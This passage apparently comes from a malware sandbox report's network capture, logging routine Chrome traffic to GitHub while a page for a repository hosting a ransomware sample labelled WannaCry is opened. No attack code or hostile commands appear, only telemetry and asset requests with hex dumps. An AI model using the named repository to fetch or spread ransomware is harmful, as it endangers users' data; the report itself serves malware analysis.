                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      99192.168.2.1649806140.82.114.214436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC793OUTPOST /github/collect HTTP/1.1
                                                                                      Host: collector.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 1977
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:27 UTC1977OUTData Raw: 7b 22 63 6c 69 65 6e 74 5f 69 64 22 3a 22 31 33 35 38 37 38 36 30 38 37 2e 31 37 31 31 32 30 35 32 34 30 22 2c 22 65 76 65 6e 74 73 22 3a 5b 7b 22 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 22 2c 22 74 69 74 6c 65 22 3a 22 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 20 61 74 20 6d 61 73 74 65 72 20 c2 b7 20 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 20 c2
                                                                                      Data Ascii: {"client_id":"1358786087.1711205240","events":[{"page":"https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip","title":"RANSOMWARE-WANNACRY-2.0/Ransomware.WannaCry.zip at master chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      2024-03-23 14:47:27 UTC578INHTTP/1.1 204 No Content
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      access-control-allow-methods: POST,OPTIONS
                                                                                      access-control-allow-headers: Content-Type
                                                                                      access-control-allow-credentials: true
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: no-cache
                                                                                      X-Runtime: 0.095185
                                                                                      Strict-Transport-Security: max-age=631138519
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      x-download-options: noopen
                                                                                      x-permitted-cross-domain-policies: none
                                                                                      x-github-backend: Kubernetes
                                                                                      X-GitHub-Request-Id: 9194:3C33:2E106F:75E433:65FEEB7F
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      100192.168.2.1649805185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC668OUTGET /favicons/favicon.svg HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: image
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:27 UTC601INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 959
                                                                                      Content-Type: image/svg+xml
                                                                                      Last-Modified: Thu, 19 Oct 2023 22:56:36 GMT
                                                                                      ETag: 0x8DBD0F6A5D50EA4
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Age: 18
                                                                                      X-Served-By: cache-iad-kiad7000081-IAD, cache-ewr18152-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 2934173, 1
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 10dde7f8fb203ceaf0ecf11d00f245a2559c1e4b
                                                                                      2024-03-23 14:47:27 UTC959INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 33 32 22 20 68 65 69 67 68 74 3d 22 33 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 32 20 33 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 36 20 30 43 37 2e 31 36 20 30 20 30 20 37 2e 31 36 20 30 20 31 36 43 30 20 32 33 2e 30 38 20 34 2e 35 38 20 32 39 2e 30 36 20 31 30 2e 39 34 20 33 31 2e 31 38 43 31 31 2e 37 34 20 33 31 2e 33 32 20 31 32 2e 30 34 20 33 30 2e 38 34 20 31 32 2e 30 34 20 33 30 2e 34 32 43 31 32 2e 30 34 20 33 30 2e 30 34 20 31 32 2e 30 32 20
                                                                                      Data Ascii: <svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M16 0C7.16 0 0 7.16 0 16C0 23.08 4.58 29.06 10.94 31.18C11.74 31.32 12.04 30.84 12.04 30.42C12.04 30.04 12.02


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      101192.168.2.1649807140.82.113.64436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC796OUTPOST /_private/browser/stats HTTP/1.1
                                                                                      Host: api.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 14626
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:27 UTC14626OUTData Raw: 7b 22 73 74 61 74 73 22 3a 20 5b 7b 22 77 65 62 56 69 74 61 6c 54 69 6d 69 6e 67 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 22 2c 22 61 70 70 22 3a 22 72 65 61 63 74 2d 63 6f 64 65 2d 76 69 65 77 22 2c 22 66 63 70 22 3a 31 39 34 30 2e 33 30 30 30 30 30 30 30 30 30 30 33 2c 22 6e 65 74 77 6f 72 6b 43 6f 6e 6e 54 79 70 65 22 3a 22 34 67 22 2c 22 73 73 72 22 3a 66 61 6c 73 65 2c 22 6c 61 7a 79 22 3a 66 61 6c 73 65 2c 22 61 6c 74 65 72 6e 61 74 65 22 3a 66 61 6c 73 65 7d 5d 2c 22 74 69 6d 65 73 74
                                                                                      Data Ascii: {"stats": [{"webVitalTimings":[{"name":"https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip","app":"react-code-view","fcp":1940.300000000003,"networkConnType":"4g","ssr":false,"lazy":false,"alternate":false}],"timest
                                                                                      2024-03-23 14:47:27 UTC1109INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Content-Type: text/plain
                                                                                      Content-Length: 0
                                                                                      Cache-Control: no-cache
                                                                                      X-RateLimit-Limit: 60
                                                                                      X-RateLimit-Remaining: 60
                                                                                      X-RateLimit-Reset: 1711208847
                                                                                      X-RateLimit-Used: 0
                                                                                      X-RateLimit-Resource: core
                                                                                      X-GitHub-Media-Type: github.v3; format=json
                                                                                      x-github-api-version-selected: 2022-11-28
                                                                                      Access-Control-Expose-Headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                      Content-Security-Policy: default-src 'none'
                                                                                      Vary: Accept-Encoding, Accept, X-Requested-With
                                                                                      X-GitHub-Request-Id: A73C:243BB:2AC1A36:4AD339C:65FEEB7F
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      102192.168.2.1649808140.82.113.64436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC795OUTPOST /_private/browser/stats HTTP/1.1
                                                                                      Host: api.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 4272
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:27 UTC4272OUTData Raw: 7b 22 73 74 61 74 73 22 3a 20 5b 7b 22 64 6f 77 6e 6c 6f 61 64 65 64 42 75 6e 64 6c 65 73 22 3a 5b 22 77 70 2d 72 75 6e 74 69 6d 65 2e 6a 73 22 2c 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 6f 6d 70 75 72 69 66 79 5f 64 69 73 74 5f 70 75 72 69 66 79 5f 6a 73 2e 6a 73 22 2c 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2e 6a 73 22 2c 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6f 64 64 62 69 72 64 5f 70 6f 70 6f 76 65 72 2d 70 6f 6c 79 66 69 6c 6c 5f 64 69
                                                                                      Data Ascii: {"stats": [{"downloadedBundles":["wp-runtime.js","vendors-node_modules_dompurify_dist_purify_js.js","vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183.js","vendors-node_modules_oddbird_popover-polyfill_di
                                                                                      2024-03-23 14:47:27 UTC1108INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Content-Type: text/plain
                                                                                      Content-Length: 0
                                                                                      Cache-Control: no-cache
                                                                                      X-RateLimit-Limit: 60
                                                                                      X-RateLimit-Remaining: 60
                                                                                      X-RateLimit-Reset: 1711208847
                                                                                      X-RateLimit-Used: 0
                                                                                      X-RateLimit-Resource: core
                                                                                      X-GitHub-Media-Type: github.v3; format=json
                                                                                      x-github-api-version-selected: 2022-11-28
                                                                                      Access-Control-Expose-Headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                      Content-Security-Policy: default-src 'none'
                                                                                      Vary: Accept-Encoding, Accept, X-Requested-With
                                                                                      X-GitHub-Request-Id: A73E:1AA4:2C1A2CB:4D4A671:65FEEB7F
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      103192.168.2.1649809140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC1060OUTGET /manifest.json HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: manifest
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:27 UTC484INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:19 GMT
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      Cache-Control: max-age=604800, public
                                                                                      ETag: W/"c75e05794d72230a695e880f1a6c83a4"
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                      2024-03-23 14:47:27 UTC2994INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:27 UTC632INData Raw: 7b 22 6e 61 6d 65 22 3a 22 47 69 74 48 75 62 22 2c 22 73 68 6f 72 74 5f 6e 61 6d 65 22 3a 22 47 69 74 48 75 62 22 2c 22 73 74 61 72 74 5f 75 72 6c 22 3a 22 2f 22 2c 22 64 69 73 70 6c 61 79 22 3a 22 73 74 61 6e 64 61 6c 6f 6e 65 22 2c 22 69 63 6f 6e 73 22 3a 5b 7b 22 73 69 7a 65 73 22 3a 22 31 31 34 78 31 31 34 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 31 31 34 78 31 31 34 2d 30 39 63 65 34 32 64 33 63 61 34 62 2e 70 6e 67 22 7d 2c 7b 22 73 69 7a 65 73 22 3a 22 31 32 30 78 31 32 30 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61
                                                                                      Data Ascii: {"name":"GitHub","short_name":"GitHub","start_url":"/","display":"standalone","icons":[{"sizes":"114x114","src":"https://github.githubassets.com/assets/apple-touch-icon-114x114-09ce42d3ca4b.png"},{"sizes":"120x120","src":"https://github.githubassets.com/a
                                                                                      2024-03-23 14:47:27 UTC832INData Raw: 7b 22 73 69 7a 65 73 22 3a 22 35 37 78 35 37 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 35 37 78 35 37 2d 32 32 66 30 39 66 35 62 33 61 36 34 2e 70 6e 67 22 7d 2c 7b 22 73 69 7a 65 73 22 3a 22 36 30 78 36 30 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 36 30 78 36 30 2d 31 39 30 33 37 61 63 38 39 37 62 66 2e 70 6e 67 22 7d 2c 7b 22 73 69 7a 65 73 22 3a 22 37 32 78 37 32 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62
                                                                                      Data Ascii: {"sizes":"57x57","src":"https://github.githubassets.com/assets/apple-touch-icon-57x57-22f09f5b3a64.png"},{"sizes":"60x60","src":"https://github.githubassets.com/assets/apple-touch-icon-60x60-19037ac897bf.png"},{"sizes":"72x72","src":"https://github.github


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      104192.168.2.1649810140.82.113.64436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC794OUTPOST /_private/browser/stats HTTP/1.1
                                                                                      Host: api.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 148
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:27 UTC148OUTData Raw: 7b 22 73 74 61 74 73 22 3a 20 5b 7b 22 69 6e 63 72 65 6d 65 6e 74 4b 65 79 22 3a 22 52 45 46 5f 53 45 4c 45 43 54 4f 52 5f 42 4f 4f 54 45 44 5f 46 52 4f 4d 5f 55 4e 43 41 43 48 45 44 5f 48 54 54 50 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 31 31 32 30 35 32 34 35 34 33 37 2c 22 6c 6f 67 67 65 64 49 6e 22 3a 66 61 6c 73 65 2c 22 73 74 61 66 66 22 3a 66 61 6c 73 65 2c 22 62 75 6e 64 6c 65 72 22 3a 22 77 65 62 70 61 63 6b 22 7d 5d 20 7d
                                                                                      Data Ascii: {"stats": [{"incrementKey":"REF_SELECTOR_BOOTED_FROM_UNCACHED_HTTP","timestamp":1711205245437,"loggedIn":false,"staff":false,"bundler":"webpack"}] }
                                                                                      2024-03-23 14:47:27 UTC1108INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Content-Type: text/plain
                                                                                      Content-Length: 0
                                                                                      Cache-Control: no-cache
                                                                                      X-RateLimit-Limit: 60
                                                                                      X-RateLimit-Remaining: 60
                                                                                      X-RateLimit-Reset: 1711208847
                                                                                      X-RateLimit-Used: 0
                                                                                      X-RateLimit-Resource: core
                                                                                      X-GitHub-Media-Type: github.v3; format=json
                                                                                      x-github-api-version-selected: 2022-11-28
                                                                                      Access-Control-Expose-Headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                      Content-Security-Policy: default-src 'none'
                                                                                      Vary: Accept-Encoding, Accept, X-Requested-With
                                                                                      X-GitHub-Request-Id: A752:42BC:2F07FB6:52BCC07:65FEEB7F
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      105192.168.2.1649811140.82.113.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC858OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/refs?type=branch HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:27 UTC507INHTTP/1.1 400 Bad Request
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Content-Type: application/json
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"8472f0ac1bd0bdea4efec9eccc6c7961"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
